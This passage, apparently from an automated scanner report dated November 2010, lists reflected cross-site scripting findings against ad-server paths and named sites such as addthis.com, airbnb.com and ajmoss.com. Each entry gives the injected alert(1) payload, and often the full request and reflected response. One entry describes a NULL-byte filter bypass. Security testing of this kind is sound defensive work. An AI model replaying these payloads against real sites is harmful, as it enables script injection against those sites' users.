/CNT/iview/259243902/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc05"-alert(1)-"4d16990a4be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.244. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/259243902/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a453d'-alert(1)-'34265905669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.245. http://redcated/CNT/iview/259243902/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/259243902/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49fe0"><script>alert(1)</script>1a99d2b2eb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9dc1'%3b640f1826efe was submitted in the REST URL parameter 4. This input was echoed as d9dc1';640f1826efe in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bf5'-alert(1)-'c83e9dcce15 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19b00</script><script>alert(1)</script>6ae1577146f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.249. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/259243905/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2921b"-alert(1)-"a62026df071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.250. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/259243905/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9f3a'-alert(1)-'77e959c3912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.251. http://redcated/CNT/iview/259243905/direct [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/CNT/iview/259243905/direct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload effb9"><script>alert(1)</script>4e33e571c88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24334'%3b23c1c18375b was submitted in the REST URL parameter 4. This input was echoed as 24334';23c1c18375b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 9; var bIsRightVersion = ...[SNIP]... .ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg=http://clk.redcated/go/203115616/direct24334';23c1c18375b;ai.146549316;ct.1/01&clickTag=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg= ...[SNIP]...
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b43d2'-alert(1)-'9c56d9ef4a6 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 9; var bIsRightVersion = ...[SNIP]... 28x90_PlaA.swf?ver=1&clickTag1=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg=b43d2'-alert(1)-'9c56d9ef4a6http://clk.redcated/go/203115616/direct;ai.146549316;ct.1/01&clickTag=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsx ...[SNIP]...
3.254. http://redcated/ER1/jview/203115616/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/ER1/jview/203115616/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d431'-alert(1)-'31089bf2ce4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 9; var bIsRightVersion = ...[SNIP]... 8x90_PlaA.swf?ver=1&clickTag1=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/xsxdata=$xsxdata/bnum=45200613/optn=64?trg=&3d431'-alert(1)-'31089bf2ce4=1http://clk.redcated/go/203115616/direct;ai.146549316;ct.1/01&clickTag=http://r1.ace.advertising.com/click/site=0000774938/mnum=0000844406/cstr=45200613=_4ce06bb3,0683843182,774938^844406^1183^0,1_/x ...[SNIP]...
3.255. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/INV/iview/255848431/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c18b"><script>alert(1)</script>7d5c27eaf83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d615e'%3b26853c9dad2 was submitted in the REST URL parameter 4. This input was echoed as d615e';26853c9dad2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aec0'-alert(1)-'6257730ab45 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 947c3</script><script>alert(1)</script>71269ad5aa5 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.259. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/K01/iview/208297447/direct/01/5244128
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25caf'-alert(1)-'623465e0d6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
3.260. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/K01/iview/208297447/direct/01/5244128
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00aaa72"-alert(1)-"43562ce68f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aaa72"-alert(1)-"43562ce68f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
3.261. http://redcated/K01/iview/208297447/direct/01/5244128 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/K01/iview/208297447/direct/01/5244128
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 691a0"><script>alert(1)</script>7cc1b80313d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10797"><script>alert(1)</script>ca7d243139f was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.263. http://redcated/NYC/iview/266847916/direct/01/8785527227 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/266847916/direct/01/8785527227
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae810"><script>alert(1)</script>669f830fd20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3fae'%3baef8df1f9d8 was submitted in the REST URL parameter 4. This input was echoed as f3fae';aef8df1f9d8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2ef6'-alert(1)-'e997e664d68 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 8; var bIsRightVersion = fal ...[SNIP]... 393687.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000774938/mnum=0000894884/cstr=31084711=_4ce06bb2,4244084227,774938^894884^1183^0,1_/xsxdata=$xsxdata/bnum=31084711/optn=64?trg=e2ef6'-alert(1)-'e997e664d68');
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85557"-alert(1)-"a23d99095eb was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize : function(unique_i ...[SNIP]...
3.267. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/TLC/jview/242390407/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a04a9"-alert(1)-"587ca1d221a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
if (!window.armapi_a1_a1) { var armapi_a1_a1 = { initialize : function(unique ...[SNIP]...
3.268. http://redcated/TLC/jview/242390407/direct/01 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/TLC/jview/242390407/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3044d'-alert(1)-'dd742439b22 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
var nRequiredVersion = 8; var bIsRightVersion = fal ...[SNIP]... 40642.replace(/!~!click!~!/g,'http://r1.ace.advertising.com/click/site=0000774938/mnum=0000894884/cstr=31084711=_4ce06bb2,4244084227,774938^894884^1183^0,1_/xsxdata=$xsxdata/bnum=31084711/optn=64?trg=&3044d'-alert(1)-'dd742439b22=1');
The value of the brand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be8ab"><script>alert(1)</script>bb838291dac was submitted in the brand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/findweather/getForecast?brand=mercurynewsbe8ab"><script>alert(1)</script>bb838291dac&query=san+jose&searchbutton.x=8&searchbutton.y=8&searchbutton=Search HTTP/1.1 Host: weather.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; ASC=1289776044:1; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:10:46 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-CreationTime: 0.060 Set-Cookie: ASC=1289787046:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com Connection: close Content-Type: text/html Content-Length: 25776
<HTML> <head> <title>Weather </title> </head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="Pragma" CONTENT"no-cache"> <title>San Jose Mercury N ...[SNIP]... <a href="/auto/mercurynewsbe8ab"><script>alert(1)</script>bb838291dac/CA/San_Jose.html" OnClick='Set_Cookie( "DefLoc", "95101", 365, "/", "mercurynews.com", "");'> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a677a"-alert(1)-"e4b91c7cfde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.phpa677a"-alert(1)-"e4b91c7cfde HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 14 Nov 2010 23:22:32 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=p5e989npde96lmtduu4317muj1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1447 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.phpa677a"-alert(1)-"e4b91c7cfde"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56a0b<script>alert(1)</script>342cda23827 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php56a0b<script>alert(1)</script>342cda23827 HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sun, 14 Nov 2010 23:22:33 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=gdbbnbffagiile5na2engvtop4; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1473 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php56a0b<script>alert(1)</script>342cda23827</strong> ...[SNIP]...
3.272. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.addthis.com
Path:
/bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 371c7"-alert(1)-"25c58f01b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/371c7"-alert(1)-"25c58f01b1b HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 14 Nov 2010 23:22:02 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 88227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/371c7"-alert(1)-"25c58f01b1b"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 190a1</script><script>alert(1)</script>04f60eeb6e3 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?location=San+Francisco&af=173684&c=cat_sf_htl190a1</script><script>alert(1)</script>04f60eeb6e3&client=ca-dp-godaddy2_xml HTTP/1.1 Host: www.airbnb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the location request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6e92</script><script>alert(1)</script>2baec830013 was submitted in the location parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?location=San+Franciscod6e92</script><script>alert(1)</script>2baec830013&af=173684&c=cat_sf_htl&client=ca-dp-godaddy2_xml HTTP/1.1 Host: www.airbnb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.275. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ajmoss.com
Path:
/bedding.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9446a"><script>alert(1)</script>e1616c188ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bedding.php/9446a"><script>alert(1)</script>e1616c188ad HTTP/1.1 Host: www.ajmoss.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:10:49 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=odgh07aucl6q1h0vc0beveup71; path=/; domain=www.ajmoss.com Set-Cookie: sortmethod=0; expires=Fri, 19-Nov-2010 06:10:50 GMT; path=/ P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa OUR NOR IND UNI COM NAV INT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Made in the USA | Bedding by Aj MOSS</title> <meta http-e ...[SNIP]... <a href="/cart.php?frompage=/bedding.php/9446a"><script>alert(1)</script>e1616c188ad" rel="nofollow"> ...[SNIP]...
3.276. http://www.ajmoss.com/bedding.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ajmoss.com
Path:
/bedding.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload c721c%0aalert(1)//5c5bd7b7e5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c721c alert(1)//5c5bd7b7e5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bedding.php/c721c%0aalert(1)//5c5bd7b7e5c HTTP/1.1 Host: www.ajmoss.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:10:50 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=9gk3vqpvca4v1evvhkkd9qtdi2; path=/; domain=www.ajmoss.com Set-Cookie: sortmethod=0; expires=Fri, 19-Nov-2010 06:10:50 GMT; path=/ P3P: policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa OUR NOR IND UNI COM NAV INT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 21981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Made in the USA | Bedding by Aj MOSS</title> <meta http-e ...[SNIP]... <!--
window.addEvent('domready', function(){ var menupos = 0; AccordionInit(menupos); new SmoothScroll(); //countdown(); //cjax_update('/bedding.php/c721c alert(1)//5c5bd7b7e5c'); }); //--> ...[SNIP]...
The value of the redir request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7060"><script>alert(1)</script>9f0809a562 was submitted in the redir parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /action_flag.shtml?flag_login=1&view_flag_menu=1&redir=%2Farticle%2F6007620%2Fchildhood_obesity_news_san_francisco.htmlc7060"><script>alert(1)</script>9f0809a562 HTTP/1.1 Host: www.associatedcontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
The value of the comment_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4791d"><script>alert(1)</script>4fa19999f32 was submitted in the comment_name parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /recaptcha_iframe.shtml?disp_type=wide&content_type=article&content_type_id=6007620&comment_name=4791d"><script>alert(1)</script>4fa19999f32 HTTP/1.1 Host: www.associatedcontent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Response
HTTP/1.0 200 OK Date: Sun, 14 Nov 2010 23:25:51 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Content-Length: 256 Connection: close Content-Type: text/html
The value of the content_type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 475f9"><script>alert(1)</script>a32fa17e26a was submitted in the content_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
